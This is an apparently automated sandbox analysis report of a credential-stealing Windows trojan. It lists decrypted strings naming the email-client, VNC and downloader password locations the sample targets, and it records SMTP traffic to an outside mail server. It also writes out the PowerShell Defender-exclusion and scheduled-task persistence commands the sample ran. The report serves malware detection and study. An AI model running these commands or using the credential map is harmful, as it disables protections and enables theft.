                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: "Username":"
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: "Secret":"
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: "ProviderName":"
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: o6806642kbM7c5
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Mailbird
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SenderIdentities
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Accounts
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Mailbird\Store\Store.db
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Server_Host
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Accounts
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Username
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: EncryptedPassword
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Mailbird
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: RealVNC 4.x
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: RealVNC 3.x
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: RealVNC 4.x
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: RealVNC 3.x
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\ORL\WinVNC3
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: TightVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: TightVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PasswordViewOnly
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: TightVNC ControlPassword
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ControlPassword
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: TigerVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\TigerVNC\Server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UltraVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passwd
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UltraVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passwd2
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UltraVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passwd
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UltraVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passwd2
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UltraVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passwd
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UltraVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passwd2
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UltraVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passwd
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UltraVNC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passwd2
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: JDownloader 2.0
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: JDownloader 2.0\cfg
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: JDownloader 2.0\cfg
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Paltalk
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: nickname
                        Source: LisectAVT_2403002A_16.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: LisectAVT_2403002A_16.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: FPzK.pdb source: LisectAVT_2403002A_16.exe, NxmtwwVGOtEdjd.exe.0.dr
                        Source: Binary string: FPzK.pdbSHA256 source: LisectAVT_2403002A_16.exe, NxmtwwVGOtEdjd.exe.0.dr
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 4x nop then jmp 05A8CF23h
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 4x nop then jmp 0795C1ACh
                        Source: global trafficTCP traffic: 192.168.2.4:49735 -> 199.79.62.115:587
                        Source: Joe Sandbox ViewIP Address: 199.79.62.115 199.79.62.115
                        Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                        Source: global trafficTCP traffic: 192.168.2.4:49735 -> 199.79.62.115:587
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: mail.mbarieservicesltd.com
                        Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                        Source: LisectAVT_2403002A_16.exe, 00000009.00000002.2901886951.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, NxmtwwVGOtEdjd.exe, 0000000F.00000002.2902484873.0000000002D3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.mbarieservicesltd.com
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1722615685.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp, NxmtwwVGOtEdjd.exe, 0000000A.00000002.1786665418.000000000323E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726399605.0000000005990000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_0130DC74
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A80620
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A80611
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A80006
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A80040
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A872B8
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A88F48
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A88F58
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A86E80
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A88B20
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A86A15
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A86A48
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_01384140
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_01384D58
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_01384488
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_06603934
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_066019A0
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_0668C218
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_06686338
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_06680040
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_0668A8F0
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_066894B0
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_06689C38
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_066839E8
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_06680006
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_066839D8
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_030CDC74
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_05737030
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_05730040
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_05730032
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_0573702B
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07950040
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07953E18
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_0795E688
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07950611
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07950620
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_0795E668
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_079572B8
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_0795001E
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07958F58
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07958F48
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07956E80
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07953E0A
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07958B20
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07956A0D
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07956A48
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_00FA4140
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_00FA4D58
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_00FA4488
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_0630AC80
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_063004C8
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_0630F578
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_0630E5B8
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_06309358
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_06307161
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1729697957.000000000757A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs LisectAVT_2403002A_16.exe
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1718798256.00000000010FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs LisectAVT_2403002A_16.exe
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000000.1647863281.0000000000BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFPzK.exe< vs LisectAVT_2403002A_16.exe
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1730117949.0000000007B90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs LisectAVT_2403002A_16.exe
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1723431532.00000000041AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs LisectAVT_2403002A_16.exe
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1723431532.00000000041AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs LisectAVT_2403002A_16.exe
                        Source: LisectAVT_2403002A_16.exe, 00000000.00000002.1722615685.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs LisectAVT_2403002A_16.exe
                        Source: LisectAVT_2403002A_16.exe, 00000009.00000002.2898676233.0000000000EF9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs LisectAVT_2403002A_16.exe
                        Source: LisectAVT_2403002A_16.exeBinary or memory string: OriginalFilenameFPzK.exe< vs LisectAVT_2403002A_16.exe
                        Source: LisectAVT_2403002A_16.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: LisectAVT_2403002A_16.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: NxmtwwVGOtEdjd.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, Icw0P7E5I25dt8WiCY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, ioHoB3xyTTvGj5kpgh.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, ioHoB3xyTTvGj5kpgh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, ioHoB3xyTTvGj5kpgh.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, Icw0P7E5I25dt8WiCY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, ioHoB3xyTTvGj5kpgh.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, ioHoB3xyTTvGj5kpgh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, ioHoB3xyTTvGj5kpgh.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/15@2/1
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeFile created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMutant created: \Sessions\1\BaseNamedObjects\nrmexAQCdAxIpmz
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB5CB.tmpJump to behavior
                        Source: LisectAVT_2403002A_16.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: LisectAVT_2403002A_16.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeFile read: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp"
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
